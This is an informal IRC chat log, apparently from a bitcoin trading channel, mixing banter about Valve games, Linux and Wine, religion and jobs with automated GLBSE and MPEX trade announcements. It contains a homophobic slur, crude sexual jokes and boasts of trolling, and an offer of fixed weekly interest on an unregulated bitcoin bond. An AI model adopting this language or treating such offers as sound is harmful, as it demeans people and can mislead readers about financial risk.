Schumer is against maker-taker Sep 22 06:25:38 keep doing this until you have nothing left Sep 22 06:25:40 <__Atlas__> so it has to be good Sep 22 06:25:42 lol Sep 22 06:26:38 When you play BM you realize how far we have come. I have to adjust to >10 years ago playing style to do good. lo. Sep 22 06:26:40 lol Sep 22 06:26:53 OneMiner: Ive played through portal 2 several times, btw Sep 22 06:26:57 Im used to source looking good Sep 22 06:27:04 [MPEX] [F.GIGA.ETF] 1452 @ 0.00029349 = 0.4261 BTC [-] Sep 22 06:27:05 [MPEX] [F.GIGA.ETF] 8948 @ 0.00029315 = 2.6231 BTC [-] Sep 22 06:27:16 you do realize its been on sale for $5 before, right? Sep 22 06:27:20 you should have grabbed it then Sep 22 06:27:26 I got portal 1 for free. Sep 22 06:27:28 OneMiner: btw, fair warning Sep 22 06:27:31 I got no monies. Sep 22 06:27:38 half the single player campaign is not single player, its co-op. Sep 22 06:27:53 I <3 co-op. Sep 22 06:28:01 I love love love co-op. Sep 22 06:28:02 portal 2 co-op is crazy fun Sep 22 06:28:29 FPS? Co-op. Boosh. Sep 22 06:28:32 OneMiner: you know whats extra hilarious? Sep 22 06:28:43 one guy Ive played co-op with on portal 2 is a game dev Sep 22 06:28:53 Yay. Sep 22 06:28:53 he said "man, if I made a game like this, valve would sue me" Sep 22 06:28:58 he now WORKS at valve. Sep 22 06:29:17 and he wont tell me anything ;_; Sep 22 06:29:18 That's great. Moar <3s Sep 22 06:29:22 nefario: how come there isn't a market maker rebate? Sep 22 06:29:35 "so, hows hl3 coming?" "fuck the NDA, gaben WILL EAT ME, I AM NOT A DONUT" Sep 22 06:29:44 lol Sep 22 06:29:59 smickles, if I add that then I'll change the whole fee structure Sep 22 06:29:59 <__Atlas__> HL3 will be worth the weight. Sep 22 06:30:04 with both maker and taker fees Sep 22 06:30:05 __Atlas__: errrrr Sep 22 06:30:06 HL is da bomb. Sep 22 06:30:11 that was the worst pun ever Sep 22 06:30:13 instead of just taker fees Sep 22 06:30:18 Also Halo/Marathon. Sep 22 06:30:30 And MW. Sep 22 06:30:31 OneMiner: I played marathon, then I tried playing halo Sep 22 06:30:33 halo is fucking shit Sep 22 06:30:35 Gawd I love games. Sep 22 06:30:42 Im glad I never bought an xbox Sep 22 06:31:17 the last console I owned was a saturn Sep 22 06:31:21 before that a snes Sep 22 06:31:21 I enjoyed the shiz out of Halo. Sep 22 06:32:00 And #2. Sep 22 06:32:41 btw, fuck you wine Sep 22 06:32:41 Legendary got hard after #1. Sep 22 06:32:52 wine /path/to/steam.exe -no-dwrite Sep 22 06:32:53 lol, I do sometimes. Sep 22 06:33:00 hahahaha Sep 22 06:33:54 pleasedontcrashpleasedontcrashpleasedontcrashpleasedontcrashpleasedontcrashpleasedontcrashpleasedontcrashpleasedontcrashpleasedontcrashpleasedontcrash Sep 22 06:34:10 Dear Linux, Plz get moar games so I can use you. Thanks, k bye. Sep 22 06:34:10 fuck have to download the sdk Sep 22 06:34:49 OneMiner: I wonder if mass effect or mirror's edge works yet Sep 22 06:34:55 I bought them but never tried Sep 22 06:34:58 got them cheap Sep 22 06:35:04 I have both..... On windows. Sep 22 06:35:16 I dont get why anyone would reboot to windows to play a game Sep 22 06:35:37 lol subtract the reboot and you are good guy. Sep 22 06:35:57 OneMiner: windows in vbox wont play games worth of shit Sep 22 06:35:58 Can't F with what works. Sep 22 06:36:08 which is ironic since they use wined3d to do it Sep 22 06:36:48 I get a higher frame rate running portal 2 in linux than in windows Sep 22 06:36:55 and yes, I tested it just for the lulz Sep 22 06:37:34 that was on my 5850 though, my 7970 gets at least 60 no matter how hard I try Sep 22 06:37:39 I'm all for it. I'll switch to Linux so fast... That something would happen. But I won't, cuz AFAIK most things don't work on Linux. Sep 22 06:37:48 [GLBSE] [OBSI.HRPT] 1 @ 0.09441999 BTC [-] Sep 22 06:37:52 OneMiner: most things actually DO work on linux Sep 22 06:38:13 plus, valve ported steam and source to linux about 3-4 years ago Sep 22 06:38:21 the osx port? the linux port cleaned up to run on osx Sep 22 06:38:56 [GLBSE] [KRAKEN] 13 @ 0.00999996 = 0.13 BTC [+] Sep 22 06:39:36 I'm on Windows for compatibility, that's all. Sep 22 06:39:52 they'll end up porting all the source games to linux Sep 22 06:40:01 which I own pretty much all of them except for l4d shit Sep 22 06:40:28 I can use Linux GUI just fine and even some CLI. I'm not afriad of drivers or whatever. If it works, I'd use it. Sep 22 06:40:42 man, wtf, I already have source sdk base 2006 and 2007 Sep 22 06:40:48 yet steam is downloading more of it Sep 22 06:41:05 I wonder if steam is smart enough to only download what I need depending on the game Sep 22 06:41:19 because I already have hl2, ep1, ep2, portal and portal 2 installed Sep 22 06:41:26 om nom nom Sep 22 06:42:02 Now I'm hungy and I want games AND conversation. This won't work out. Sep 22 06:43:18 fuck is gyoza Sep 22 06:43:43 isnt that the thing they killed at the end of ghostbusters? Sep 22 06:43:45 <__Atlas__> Sounds Jewish Sep 22 06:44:07 <__Atlas__> It's Japanese pasta Sep 22 06:44:10 <__Atlas__> made of rice Sep 22 06:44:16 rice pasta. wat. Sep 22 06:44:29 <__Atlas__> dumplings Sep 22 06:44:35 oh. Sep 22 06:45:25 It's like a won-ton but with more stuff inside. Sep 22 06:45:30 wonton? Sep 22 06:45:41 gyoza = nom Sep 22 06:45:46 some might call it an eatee Sep 22 06:45:53 so its like a pizza pocket Sep 22 06:45:58 You buy them in big frozen bags from large stores. Sep 22 06:45:59 <__Atlas__> http://www.youtube.com/watch?v=0yB7NVVRraw#t=13m50s Sep 22 06:46:10 OneMiner: or make them from scratch! Sep 22 06:46:24 I can make wontons. That's my limit. Sep 22 06:46:26 but that's not what I did :P Sep 22 06:47:52 Sort of like a pierogi but better, maybe. Sep 22 06:51:47 <__Atlas__> http://i.imgur.com/9efqB.jpg Sep 22 06:52:19 FUCKING 4CHAN Sep 22 06:52:25 Shopped! Sep 22 06:53:43 OneMiner: duh, its 4chan Sep 22 06:54:04 [MPEX] [S.MPOE] 42700 @ 0.00039308 = 16.7845 BTC [-] Sep 22 06:54:45 I know. I can't help it. Who would care if they did kiss? WTF would that have to do with anything? Bah I say! BAH! Sep 22 06:55:16 W-w-w-why would I care? Hes just a republican canidate! Hrmoh! Sep 22 06:57:12 hahah who cares? I know this guy, gay as gay could be. He used to be in the closet. It was hell for him and people around him. He's super gay now, going to bath houses and things. I'm happy for him. Sep 22 06:57:22 you know what I find funny? Im double checking steam file integrity..... Sep 22 06:57:27 hl2: a little over 4 gigs Sep 22 06:57:35 ep1: a little over 5 gigs Sep 22 06:57:39 ep2: a little over 8 gigs Sep 22 06:58:03 Oh noes! I don't have room for the next one! Sep 22 06:58:16 yeah, hl3 should be at least 9000 gigs Sep 22 06:58:34 I need more SATA. Surrender your SATA, or else! Sep 22 06:58:47 fuck sata, need some memristor sockets on the mobo Sep 22 06:59:05 Jesus.... If only..... Sep 22 06:59:08 OneMiner: btw, re bath houses Sep 22 06:59:33 I think the only way for someone to prove they're straight is to go to a public bath house during gay hour. Sep 22 06:59:34 [GLBSE] [BIB.BVPS] 510 @ 0.0044 = 2.244 BTC [-] Sep 22 06:59:51 also, damnit, hl2 validation, 5 files failed to validate and will be reacquired Sep 22 06:59:58 no wonder if was downloading parts of the sdks Sep 22 07:00:25 I went to a Russian sauna once. That was wierd enough for me, thank you. Sep 22 07:01:03 lost coast: less than 3gb Sep 22 07:01:08 Was Aragorn there? Sep 22 07:01:10 and I doubt it even uses a fraction of that Sep 22 07:01:23 Ya but lost coast is like 10 minutes to play. Sep 22 07:01:28 less than 10 Sep 22 07:01:30 Ive seen speed runs Sep 22 07:01:39 you know the jump glitch where you can air surf? Sep 22 07:01:53 someone air surfed up the cliff side and hopped in the basket. Sep 22 07:01:56 Nope. Never saw a vid. Just did it myself. Sep 22 07:02:23 Sick demo or whatever it is. I like the design notes. Sep 22 07:03:23 portal 1 has those Sep 22 07:03:32 gotta beat the game to turn them on iirc Sep 22 07:03:43 its really interesting the design process that goes into this Sep 22 07:03:58 Ooo, I beat it.... I'll need to take a second look. Sep 22 07:04:02 portal 1: 5.3 gigs Sep 22 07:04:13 You know... The impossible room stumped me for a bit. Sep 22 07:04:33 which one? Sep 22 07:04:48 *rimshot* Sep 22 07:04:54 haha Sep 22 07:05:53 [GLBSE] [OBSI.HRPT] 1 @ 0.08011 BTC [-] Sep 22 07:05:54 [GLBSE] [OBSI.HRPT] 12 @ 0.0801 = 0.9612 BTC [-] Sep 22 07:06:03 Holy friggin disclamer from the end of the Atlas video! Sep 22 07:06:23 yeah I said that in #bitcoin lol Sep 22 07:07:52 With that many words I could disclaim anything. Sep 22 07:08:10 well, according to nefario, that makes you evil and in need of punishment Sep 22 07:08:36 That is evil. Stupid EULAs are ment to discourage reading. Sep 22 07:09:03 In my mind none of them are legal. Sep 22 07:09:11 But that counts for nothing of course. Sep 22 07:10:00 I don't think they've really been tested all that much Sep 22 07:10:10 I think I poop on them. Sep 22 07:11:10 portal 2: 11.6gb Sep 22 07:11:13 they're getting bigger Sep 22 07:11:32 Ooo, product idea. Print out Apple EULA on comfy tripple ply toilet paper and sell it at a huge markup. Sep 22 07:11:45 <__Atlas__> https://boards.4chan.org/pol/res/5665457 Sep 22 07:12:09 >4chan Sep 22 07:12:12 >/pol/ Sep 22 07:12:17 neigh. Sep 22 07:12:50 My freakin interwebs are barely fast enough for bitcoin mining. Sep 22 07:14:47 source sdk base 2006: 2.8 gb Sep 22 07:14:51 [GLBSE] [BLUECHIP] 2 @ 0.1 = 0.2 BTC [+] Sep 22 07:15:46 2007: 4.7 gb Sep 22 07:16:42 That's uncalled for. Sep 22 07:17:03 ahh, now I see the problem Sep 22 07:17:08 10 files failed to validate on that Sep 22 07:17:11 I wonder wtf happened Sep 22 07:17:16 probably more steam crazyness Sep 22 07:18:39 tf2 is 10gb, but thats grown since initial release Sep 22 07:19:06 <[\\\]> STFU Sep 22 07:21:01 [GLBSE] [GIGAMINING] 1 @ 0.67799999 BTC [-] Sep 22 07:21:04 [MPEX] [S.MPOE] 2826 @ 0.00039308 = 1.1108 BTC [-] Sep 22 07:23:13 [GLBSE] [TYGRR.BOND-P] 2 @ 0.04 = 0.08 BTC [+] Sep 22 07:26:26 http://www.youtube.com/watch?v=f_4UQWZmfwg fun music stuff. Sep 22 07:28:02 <__Atlas__> Prepare to cry: http://www.youtube.com/watch?v=kxlJ8nzMngM Sep 22 07:32:18 [GLBSE] [SILVER] 1 @ 0.00999 BTC [+] Sep 22 07:32:53 __Atlas__: how did you find that? the user signed up yesterday and made that single video Sep 22 07:33:20 I don't get it why should I cry? Those laws (if they exist) should be struck down in a very public way and we should have a party after. Sep 22 07:33:28 <__Atlas__> copumpkin: 4chan Sep 22 07:33:31 ah Sep 22 07:33:36 you're _one of those_ Sep 22 07:33:53 :) Sep 22 07:34:19 Probably a big party, we should tax the beer makers a bit for that too. Sep 22 07:34:34 (for the beers) Sep 22 07:35:00 [(cuz I want to get drunk)] Sep 22 07:38:07 copumpkin umad homie Sep 22 07:38:49 <__Atlas__> I am trolling 4chan so hard right now. Sep 22 07:38:56 <__Atlas__> I am pretending to be a collectivist Sep 22 07:38:58 prove it Sep 22 07:39:10 also what is 4chan Sep 22 07:39:25 <__Atlas__> message board Sep 22 07:39:27 <__Atlas__> anonymous Sep 22 07:39:29 <__Atlas__> message board Sep 22 07:39:39 ok Sep 22 07:44:18 4chan is basically the inner most circle of hell Sep 22 07:45:17 Not a fan myself, but I love the fact that it's there. It's a check of sorts. If that goes away we are in trouble. Sep 22 07:45:33 More trouble. Sep 22 07:47:05 [MPEX] [S.MPOE] 39401 @ 0.00039289 = 15.4803 BTC [-] Sep 22 07:52:44 Well, who's interested in 0.5% fixed weekly interest? Sep 22 07:54:16 [GLBSE] [BFLS] 4 @ 0.695 = 2.78 BTC [-] Sep 22 07:58:20 [GLBSE] [PAJKA.BOND] 3 @ 0.08225 = 0.2468 BTC [-] Sep 22 07:59:31 [GLBSE] [PAJKA.BOND] 1 @ 0.0823 BTC [+] Sep 22 08:03:21 [GLBSE] [BTC-BOND] 10000 @ 0.01 = 100 BTC [+] Sep 22 08:03:46 <__Atlas__> https://boards.4chan.org/pol/res/5666314 Sep 22 08:03:50 <__Atlas__> I am getting good at this Sep 22 08:05:22 [GLBSE] [SILVER] 10 @ 0.00999 = 0.0999 BTC [+] Sep 22 08:06:24 Facepalm worthy to be sure. Sep 22 08:11:32 [GLBSE] [MERGEDMINING] 2 @ 0.08299 = 0.166 BTC [+] Sep 22 08:17:27 Seeing the 100 BTC purchase of BTC-BOND, I guess someone was indeed interested. Sep 22 08:21:32 lol Sep 22 08:21:53 Loan now added to spreadsheet. Sep 22 08:22:15 [MPEX] [F.GIGA.ETF] 318 @ 0.00029315 = 0.0932 BTC [-] Sep 22 08:22:17 [MPEX] [F.GIGA.ETF] 582 @ 0.00029242 = 0.1702 BTC [-] Sep 22 08:22:18 [MPEX] [S.MPOE] 17068 @ 0.00038684 = 6.6026 BTC [-] Sep 22 08:22:19 [MPEX] [S.MPOE] 3932 @ 0.00039137 = 1.5389 BTC [+] Sep 22 08:22:54 [GLBSE] [SILVER] 4 @ 0.00999 = 0.04 BTC [+] Sep 22 08:29:28 [GLBSE] [FPGAMINING] 19 @ 0.361 = 6.859 BTC [+] Sep 22 08:30:48 he rarely is Sep 22 08:30:58 usagi: I pm'ed you yesterday, you didnt pm back :< Sep 22 08:31:25 you downloaded black mesa too? Sep 22 08:31:26 [GLBSE] [ASICMINER] 2 @ 0.121889 = 0.2438 BTC [+] Sep 22 08:31:38 so do I! Sep 22 08:31:47 For only ∞ daily payments of 99.99$, this fabulous Scamotron 5000 can be yours! Downloading poorness will never have been this easy or this fast! Sep 22 08:31:50 Im using wine upstream stable. Sep 22 08:32:06 BTC-Mining: so its a usenet client? lawls Sep 22 08:32:18 usagi: I beat portal 2, beginning to end, on linux Sep 22 08:32:29 Prolly, I'm just a door to door seller. Sep 22 08:32:29 and thats currently the most advanced source game Sep 22 08:32:36 I have no idea what it does. Sep 22 08:32:38 oh god portal Sep 22 08:32:45 <__Atlas__> usagi: Why? :O Sep 22 08:32:51 very few games make me want to play them over and over again Sep 22 08:32:52 Except solving your problems! By putting you on the street. Sep 22 08:33:02 portal 1 has a very bad problem though Sep 22 08:33:08 Ive played though it so many times I speed run it Sep 22 08:33:27 pff. Portal... Half-Life... Sep 22 08:33:30 the same thing I do to quake1's first episode on nightmare mode Sep 22 08:33:41 I play NES/SNES/GBA Sep 22 08:33:50 BTC-Mining: I ported znses to linux. point? Sep 22 08:34:11 [GLBSE] [ASICMINER] 10 @ 0.121889 = 1.2189 BTC [+] Sep 22 08:34:13 That is incredibly awesome. Sep 22 08:34:34 A great service to humanity Sep 22 08:34:43 [GLBSE] [ASICMINER] 14 @ 0.12199 = 1.7079 BTC [+] Sep 22 08:34:45 <__Atlas__> I still play board games Sep 22 08:34:50 well, it was a great service until pagefault faggoted his way to defeat. Sep 22 08:34:54 Those are nice too. Sep 22 08:35:04 I suck dongs. All of them. Sep 22 08:39:49 Well I have BTC to spend again. If anyone has some stock to get rid off... Sep 22 08:40:00 <<< Please proceed to ask there Sep 22 08:40:25 And not dump on market until you sell shares for 1% of their value Sep 22 08:47:09 we already knew that! Sep 22 08:47:18 I've been implementing that advice for ages already :) Sep 22 08:48:02 https://bitcointalk.org/index.php?topic=91173.msg1211518#msg1211518 Sep 22 08:48:04 oh fuck Sep 22 08:50:46 my dick has a hardness number of 10. Sep 22 08:51:04 usagi, this is what we call in the industry "porn". Sep 22 08:55:02 hes younger than I am?! Sep 22 08:55:38 o.O Sep 22 08:55:39 I don't think theymos is very old, if not 21 Sep 22 08:55:58 er Sep 22 08:56:06 usagi: whats with you? Sep 22 08:56:18 Im immortal. bwhahaha. Sep 22 08:57:04 immoral* Sep 22 08:57:09 usagi: man Sep 22 08:57:17 usagi: yes, but did you know nefario is really a giraffe? Sep 22 08:57:36 copumpkin: "harder, harder" Sep 22 08:57:37 I don't keep logs, so having the omniscient one here to answer my questions is helpful Sep 22 08:58:16 damn, I missed out Sep 22 08:58:23 usagi seems to be under the influence of some pretty good stuff... Sep 22 08:58:27 usagi: seriously though, if you were reeeeeaaaaaalllllly a japanese woman, you'd figure out someway to prove it. Sep 22 08:58:30 [MPEX] [F.GIGA.ETF] 962 @ 0.00029242 = 0.2813 BTC [-] Sep 22 08:58:31 [MPEX] [F.GIGA.ETF] 1392 @ 0.00029235 = 0.407 BTC [-] Sep 22 08:58:33 [MPEX] [F.GIGA.ETF] 5846 @ 0.00029232 = 1.7089 BTC [-] Sep 22 08:58:37 I think I'll pass :) Sep 22 08:59:22 5000 or no deal Sep 22 08:59:47 lol Sep 22 09:01:32 have fun! Sep 22 09:10:58 I can't help but notice usagi's extravagance and foolishness has been quite exaggerated today. He's been saying pretty crazy stuff all day. Sep 22 09:11:11 I can't help but notice he's also not identified. Sep 22 09:11:31 [02:11:21] usagi is logged in as tsukino Sep 22 09:11:46 identifying to nickserv is good enough for most verification Sep 22 09:11:47 [GLBSE] [PAJKA.BOND] 1 @ 0.0823 BTC [+] Sep 22 09:11:55 True Sep 22 09:13:04 <__Atlas__> He? Sep 22 09:13:38 that's the pronoun usagi's used before Sep 22 09:13:51 Sorry... my bad... "Her majesty" Sep 22 09:13:59 [GLBSE] [BIB.BVPS] 14 @ 0.0044 = 0.0616 BTC [-] Sep 22 09:14:02 Since she's a vampire princess and all... Sep 22 09:14:55 Look up Usagi Tsukino together on google. Those names, they go together. Sep 22 09:16:48 [GLBSE] [OBSI.HRPT] 1 @ 0.09146998 BTC [+] Sep 22 09:17:15 <__Atlas__> Well, I am so bored with my life, I've decide to join the National Guard. Sep 22 09:17:55 indoctrination into the military isn't something I'd expect __Atlas__ to find appealing Sep 22 09:18:18 <__Atlas__> It's not indoctrination but rather Sep 22 09:18:27 <__Atlas__> protecting the constitution from within Sep 22 09:18:40 by becoming an unquestioning cog Sep 22 09:18:49 It's the name of an hotel? Google lied to me! Sep 22 09:19:07 not questioning the goals, just the means by which they are reached and how they mesh with your ideals :P Sep 22 09:19:24 <__Atlas__> I can always quit... in 5 years. Sep 22 09:19:31 fair enough :) Sep 22 09:19:42 what if you're an authoritarian socialist by the end of it? Sep 22 09:19:47 who will I troll? Sep 22 09:20:06 Google told me those names where put together the other way around! Sep 22 09:20:10 <__Atlas__> I won't be. Sep 22 09:20:16 <__Atlas__> Dogma is not my thing Sep 22 09:20:20 <__Atlas__> no matter my preferences Sep 22 09:20:22 <__Atlas__> morally Sep 22 09:21:59 <__Atlas__> The real reason is I want to start a private security company in the future Sep 22 09:22:07 <__Atlas__> I might as well start here. Sep 22 09:23:08 ah Sep 22 09:23:23 Bodyguards/Security guards agency? Sep 22 09:23:30 Millitary service can be hard on a person. I advise talking to as many former service members as possible. Sep 22 09:24:07 <__Atlas__> BTC-Mining: Yes, that's the idea. Sep 22 09:24:25 <__Atlas__> If you had seen my famous private army comment Sep 22 09:24:33 <__Atlas__> It's a fascination of mine. Sep 22 09:26:41 Pitch... Too..... High..... Sep 22 09:28:06 [MPEX] [S.MPOE] 24782 @ 0.0003875 = 9.603 BTC [-] Sep 22 09:38:24 OneMiner: Didn't it break your whole house down, not just windows? Sep 22 09:44:30 haha Sep 22 09:50:18 Well you must live in Russia or something then... Sep 22 09:54:12 All housings are converted reinforced concrete bunkers from the cold war era right? Sep 22 09:55:06 [MPEX] [S.MPOE] 21468 @ 0.00038584 = 8.2832 BTC [-] Sep 22 10:08:54 hahaha that's pretty funny. I'm trying to prove to luke that a universe can exist without a god. It takes effort. Sep 22 10:10:44 The universe is just there without explanation. If it's about the need of a beggining/creator for something to exist... then we get to the who created god reflection... Sep 22 10:11:35 Either way, no scenario can go around that something appeared out of nowhere. Sep 22 10:12:02 I suggest that there is no beggining. Sep 22 10:17:14 or at least that something somewhere in the Universe will eventually create another Universe, and something in that Universe will create ours in a loop fashion. Because loops ∞ reminds me of bowties, and that's much more elegant. Sep 22 10:17:59 Any scenario seems as good as any other you can make up. Sep 22 10:21:05 [MPEX] [F.GIGA.ETF] 2700 @ 0.00029232 = 0.7893 BTC [-] Sep 22 10:27:56 Ya, it's all up in the air. Hawking talked about a zero sum universe. Interesting stuff. Sep 22 10:29:48 Tell luke my god makes the universe possible. Tell him he's not the same, because he's the same but has an extra hair follicle on his head, so he's not really the same, just similar. But that my god is still more kickass than is for the extra hair. Sep 22 10:31:38 Although, in all seriousness, I do not mind about religion in general. Mostly good teachings and lessons. I do have an issue with people applying religious texts contractually. Sep 22 10:34:29 Wow, I would have a big problem with that. Sep 22 10:34:40 I dont understand why people do that Sep 22 10:34:46 its not what Jesus preached Sep 22 10:34:54 for a nation full of Christians, they're pretty non-Jesusly. Sep 22 10:36:01 I agree. I learned a lot of this christian stuff when I was younger. Do you know how many christians are in the millitary? Their hypocracy blows my mind. Sep 22 10:36:17 there is no problem with defending yourself Sep 22 10:36:37 Diablo-D3, I think that's a major problem... Sep 22 10:36:43 God would beg(NOT) to differ. Sep 22 10:37:03 People who say that... Sep 22 10:37:09 thats not what I mean Sep 22 10:37:11 It's not what... etc etc Sep 22 10:37:16 theres no problem with _defending_ itself. Sep 22 10:37:19 er yourself Sep 22 10:37:31 the military has simply been diverted from its original goal Sep 22 10:37:32 The christian god said in no uncertain terms that killing was not an option, ever. Sep 22 10:37:43 yes, and he gave that order to everyone Sep 22 10:37:51 there are those who do not follow the rules Sep 22 10:38:39 I took the time to actually read the Bible (Old and New Testament in full) and I'm at a loss at what some people says it preaches... they're really focusing hardcore on tiny bits which pleases them and ignore 99% of it. Sep 22 10:38:39 Ya, so that's why my mind is blown. There are lots of christians in the millitary. Will they fire over the heads of the enemy while their brothers in arms are killed? Sep 22 10:38:57 It's actually an interesting read. Sep 22 10:44:16 <__Atlas__> Okay, not joining the national guard. Nevermind. Sep 22 10:44:27 <__Atlas__> That one phone call did it for me. Sep 22 10:44:54 ? Sep 22 10:45:38 <__Atlas__> The recruiter just gave me the impression that it's not a well-run institution. Sep 22 10:46:28 WTF.... dood, don't join the millitary. Sep 22 10:47:09 Well, depends on the country One Miner... Sep 22 10:47:23 <__Atlas__> Bah, I just need to find something to do. Most of the jobs I've tried suck. Sep 22 10:47:41 <__Atlas__> And 50 hour week ultimatums aren't my thing. Sep 22 10:48:05 [MPEX] [F.GIGA.ETF] 6100 @ 0.00029232 = 1.7832 BTC [-] Sep 22 10:48:07 No, if you are worried about if it's well-run or not.... Just don't join. You'll be miserable. Sep 22 10:48:50 Atlas: May I recommend a QA job in the video game industry? Sep 22 10:49:02 There's no such thing as a well run army. They are too friggin big and there are little dictators all over the place. Sep 22 10:49:35 Tiny itty-bitty dictators who could potentially hold your life in their hands. Think about it. Sep 22 10:49:53 <__Atlas__> BTC_Mining: That does sound interesting. Sep 22 10:50:04 <__Atlas__> OneMiner: It seems what you are saying is unfortunately true. Sep 22 10:50:28 <__Atlas__> BTC-Mining: I will look into this. Austin is bound to have something. Sep 22 10:50:36 Play games and fill bug reports &/or correct them Sep 22 10:50:57 It's not as fun as it sounds however. Sep 22 10:51:35 I kinda want to do QA on games.... Friend of mine did that. Went to work drunk all the time and screwed with everybody there. Not my cup of tea but sounds like a nice enviroment. Sep 22 10:52:06 He's lucky... wouldn't pass at all here. Sep 22 10:52:28 <__Atlas__> All I really want is capital to start a small business but I need to build my savings just a bit more. Sep 22 10:52:48 BTC-Mining may I ask about the pay? Sep 22 10:53:13 Not sure, depends on the company I suppose. Sep 22 10:53:37 For me it was slightly over minimum salary. Sep 22 10:54:30 :'( Sep 22 10:54:46 <__Atlas__> Is it just me or does it seem the economy just sucks? Sep 22 10:55:35 Well I was in a consultancy company. I'm also not working on the games, just playing them to find bugs so the developers can focus on correcting them. Sep 22 10:56:03 It's unexperienced labor. Sep 22 10:56:38 There's at least career paths and excellent work environment. Sep 22 10:57:00 But yeah, hard to get high paying jobs nowaday. Sep 22 10:57:07 I've been earning more trading on GLBSE than working. Sep 22 10:58:11 <__Atlas__> I've noticed that. The lack of liquidity on GLBSE makes for some profitable trades Sep 22 10:58:16 man Sep 22 10:58:19 black mesa is weird Sep 22 10:58:21 I know the plot Sep 22 10:58:33 <__Atlas__> Black Mesa doesn't have Xen :( Sep 22 10:58:37 and nothing has blown up yet Sep 22 10:58:39 Well the dividends aren't bad either Atlas Sep 22 10:58:51 yet Sep 22 10:58:55 Im about to fuck shit up Sep 22 10:58:59 damn me. Sep 22 11:13:41 [MPEX] [S.MPOE] 17277 @ 0.00038552 = 6.6606 BTC [-] Sep 22 11:13:43 [MPEX] [S.MPOE] 32723 @ 0.00038537 = 12.6105 BTC [-] Sep 22 11:16:41 [GLBSE] [ASICMINER] 5 @ 0.1200001 = 0.6 BTC [-] Sep 22 11:24:52 ah Sep 22 11:32:28 Goog lord, recession! You guys keep talking about it and making ever more hypothetical catastrophic scenarios. I'll be nearby, just heading with this money to the stock market and going to camp there.. Sep 22 11:32:36 Where is this going tho? Sep 22 11:33:51 Ah... that's it? Sep 22 11:35:13 What do you mean? Sep 22 11:36:16 [GLBSE] [OBSI.HRPT] 5 @ 0.082 = 0.41 BTC [-] Sep 22 11:39:53 [GLBSE] [GSDPT] 100 @ 0.003365 = 0.3365 BTC [-] Sep 22 11:40:25 [GLBSE] [OBSI.HRPT] 1 @ 0.08199999 BTC [-] Sep 22 11:41:06 [MPEX] [S.MPOE] 18102 @ 0.00038556 = 6.9794 BTC [+] Sep 22 11:45:14 [GLBSE] [ASIC.COOP] 2 @ 0.5 = 1 BTC [+] Sep 22 11:46:22 [GLBSE] [MU] 1 @ 0.19 BTC [-] Sep 22 11:46:24 [GLBSE] [MU] 2 @ 0.18 = 0.36 BTC [-] Sep 22 11:46:25 [GLBSE] [MU] 2 @ 0.17 = 0.34 BTC [-] Sep 22 11:46:26 [GLBSE] [MU] 3 @ 0.16 = 0.48 BTC [-] Sep 22 11:46:28 [GLBSE] [MU] 12 @ 0.1501 = 1.8012 BTC [-] Sep 22 11:46:53 [GLBSE] [ASICMINER] 2 @ 0.12198999 = 0.244 BTC [+] Sep 22 11:46:55 [GLBSE] [MU] 14 @ 0.1501 = 2.1014 BTC [-] Sep 22 11:46:56 [GLBSE] [MU] 3 @ 0.15 = 0.45 BTC [-] Sep 22 11:49:59 [GLBSE] [NYAN.C] 1 @ 0.26020001 BTC [-] Sep 22 11:50:00 [GLBSE] [NYAN.C] 9 @ 0.2602 = 2.3418 BTC [-] Sep 22 11:50:02 [GLBSE] [NYAN.C] 36 @ 0.26 = 9.36 BTC [-] Sep 22 11:52:56 [GLBSE] [FUTUREFUND] 88 @ 0.00012931 = 0.0114 BTC [-] Sep 22 11:52:58 [GLBSE] [FUTUREFUND] 8 @ 0.000127 = 0.001 BTC [-] Sep 22 11:53:53 [GLBSE] [FUTUREFUND] 5 @ 0.000115 = 0.0006 BTC [-] Sep 22 11:53:54 [GLBSE] [FUTUREFUND] 6924 @ 0.00010001 = 0.6925 BTC [-] Sep 22 11:56:46 [GLBSE] [NASTY] 1 @ 0.51 BTC [+] Sep 22 11:56:47 [GLBSE] [NASTY] 3 @ 0.51 = 1.53 BTC [+] Sep 22 11:57:50 [GLBSE] [COGNITIVE] 4 @ 0.5999 = 2.3996 BTC [+] Sep 22 11:59:41 [GLBSE] [BFLS.RIG] 1 @ 0.89 BTC [+] Sep 22 11:59:43 [GLBSE] [BFLS.RIG] 2 @ 0.897 = 1.794 BTC [+] Sep 22 12:01:30 [GLBSE] [MOORE] 2 @ 0.5 = 1 BTC [+] Sep 22 12:01:32 [GLBSE] [MOORE] 1 @ 0.5005 BTC [+] Sep 22 12:01:33 [GLBSE] [MOORE] 2 @ 0.500999 = 1.002 BTC [+] Sep 22 12:03:04 [GLBSE] [RSM] 10 @ 0.3 = 3 BTC [+] Sep 22 12:04:25 [GLBSE] [BTC-MINING] 1 @ 0.978 BTC [-] Sep 22 12:04:27 [GLBSE] [BTC-MINING] 9 @ 0.978999 = 8.811 BTC [+] Sep 22 12:05:51 [GLBSE] [NASTY] 5 @ 0.5099 = 2.5495 BTC [-] Sep 22 12:07:05 [MPEX] [F.GIGA.ETF] 154 @ 0.00029232 = 0.045 BTC [-] Sep 22 12:07:07 [MPEX] [F.GIGA.ETF] 15010 @ 0.00029079 = 4.3648 BTC [-] Sep 22 12:07:08 [MPEX] [F.GIGA.ETF] 1098 @ 0.00029036 = 0.3188 BTC [-] Sep 22 12:22:02 nefario was last seen in #bitcoin-assets 5 hours, 51 minutes, and 47 seconds ago: instead of just taker fees Sep 22 12:22:19 so Sep 22 12:22:27 played a few levels of black mesa Sep 22 12:22:37 [GLBSE] [GSDPT] 16 @ 0.003365 = 0.0538 BTC [-] Sep 22 12:22:37 they fixed the best bug of all Sep 22 12:22:49 the fucking batteries Sep 22 12:25:08 what is a good % premium to pay when borrowing shares? Sep 22 12:25:28 and should it be based on time or simply a % of dividends? Sep 22 12:31:15 [GLBSE] [ZETA-MINING] 1 @ 0.17100001 BTC [-] Sep 22 12:31:16 [GLBSE] [ZETA-MINING] 100 @ 0.171 = 17.1 BTC [-] Sep 22 12:31:17 [GLBSE] [ZETA-MINING] 4 @ 0.171 = 0.684 BTC [-] Sep 22 12:31:18 [GLBSE] [ZETA-MINING] 18 @ 0.17 = 3.06 BTC [-] Sep 22 12:39:56 [MPEX] [S.MPOE] 12525 @ 0.00038556 = 4.8291 BTC [+] Sep 22 12:39:58 [MPEX] [S.MPOE] 16706 @ 0.0003875 = 6.4736 BTC [+] Sep 22 12:43:16 [GLBSE] [OBSI.HRPT] 5 @ 0.08102 = 0.4051 BTC [-] Sep 22 12:49:29 [GLBSE] [OBSI.HRPT] 25 @ 0.081 = 2.025 BTC [-] Sep 22 12:49:30 [GLBSE] 